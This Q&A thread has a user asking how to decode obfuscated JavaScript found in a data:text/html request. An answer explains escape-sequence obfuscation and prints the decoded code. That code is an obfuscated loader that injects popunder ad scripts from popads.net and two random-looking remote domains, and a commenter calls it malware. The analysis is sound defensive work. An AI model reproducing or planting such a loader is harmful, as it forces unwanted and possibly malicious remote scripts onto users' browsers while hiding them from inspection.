# Decoding letters like "s\u0069\u0074\u0065\u0049\u0064"

Tags: javascript

I tried to decode a data:text/html request and after all possible decoding I found strings like `"s\u0069\u0074\u0065\u0049\u0064"` .

What type of encoding is this? Is it probably JavaScript?

Here is the encoded JavaScript

```
(function() {
var k = window;
k["\x5f\u0070\x6fp"] = [
    ["s\u0069\u0074\u0065\u0049\u0064", 1602827],
    ["mi\x6eB\x69d", 0],
    ["\x70\x6f\u0070\x75n\u0064e\u0072\u0073P\x65\x72IP", 0],
    ["d\x65l\u0061\x79\u0042\x65\x74\x77\u0065\x65n", 0],
    ["\x64\u0065\x66\x61u\x6c\x74", false],
    ["def\x61\u0075\u006c\x74\x50e\u0072\x44\u0061y", 0],
    ["\u0074o\u0070m\u006f\u0073\x74\u004c\x61\u0079\x65r", !1]
];
var n = ["\u002f/\x63\x31.\u0070o\u0070ads.ne\x74/\u0070\x6fp\x2ejs", "\u002f\x2fc2.\x70\x6f\u0070\u0061d\u0073\x2ene\x74\x2f\u0070\x6fp.\u006as", "\x2f\u002fw\x77\x77\x2e\x63\u006dp\x6b\x79\u006e\x68\x68\u006dk\u006e\u0069\x2e\x63o\x6d\u002f\u0067e\x2ej\x73", "\u002f\x2f\u0077\x77w.\u006b\x78\x6fu\u006em\u0076\x66\x6bm\u0076\u0076.\x63o\x6d\u002fk\x75\x75\u002e\x6a\u0073", ""],
    m = 0,
    x, y = function() {
        if ("" == n[m]) return;
        x = k["\x64\x6fc\x75\x6den\x74"]["\x63\u0072\x65a\x74\x65Elem\u0065\u006et"]("\x73\x63\x72ipt");
        x["t\x79\u0070\u0065"] = "\u0074\x65\u0078t\x2f\u006aa\x76a\u0073\u0063\u0072\x69\u0070\u0074";
        x["as\x79\x6ec"] = !0;
        var v = k["doc\x75m\x65n\u0074"]["ge\u0074\x45\u006c\u0065\x6d\u0065\u006e\u0074\u0073\u0042\u0079\u0054a\x67\x4ea\u006d\x65"]("\u0073\u0063\x72i\x70\x74")[0];
        x["\x73\u0072\u0063"] = n[m];
        if (m < 2) {
            x["\u0063\x72\u006f\x73\u0073\x4frig\u0069n"] = "\u0061\u006e\x6f\x6e\x79m\u006f\u0075\u0073";
        };
        x["\u006fn\x65\x72r\x6f\x72"] = function() {
            m++;
            y()
        };
        v["\x70\u0061\x72\u0065\u006etN\u006fd\u0065"]["ins\u0065r\x74B\x65\u0066\x6f\u0072e"](x, v)
    };
y()
})();
```

And here is the full encoded request:

https://pastebin.com/J4Svw42X

Comment: Yep, it's javascript. Just put it in a var and `console.log` it to see what it actually says (spoiler: malware).

Answer (score 2):

This code has been deliberately [obfuscated](https://en.wikipedia.org/wiki/Obfuscation_(software)) using [escape sequences](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation).

You can manually decode them, or use an automated tool (like [jsbeautifier](http://jsbeautifier.org/) with the "Unescape printable chars encoded as \xNN or \uNNNN?" option enabled).

```
(function() {
    var k = window;
    k["_pop"] = [
        ["siteId", 1602827],
        ["minBid", 0],
        ["popundersPerIP", 0],
        ["delayBetween", 0],
        ["default", false],
        ["defaultPerDay", 0],
        ["topmostLayer", !1]
    ];
    var n = ["//c1.popads.net/pop.js", "//c2.popads.net/pop.js", "//www.cmpkynhhmkni.com/ge.js", "//www.kxounmvfkmvv.com/kuu.js", ""],
        m = 0,
        x, y = function() {
            if ("" == n[m]) return;
            x = k["document"]["createElement"]("script");
            x["type"] = "text/javascript";
            x["async"] = !0;
            var v = k["document"]["getElementsByTagName"]("script")[0];
            x["src"] = n[m];
            if (m < 2) {
                x["crossOrigin"] = "anonymous";
            };
            x["onerror"] = function() {
                m++;
                y()
            };
            v["parentNode"]["insertBefore"](x, v)
        };
    y()
})();
```

In this case it appears to be injecting some scripts in the DOM, that appear to be advertisement related. They may actually be malicious though, as most obfuscated code is.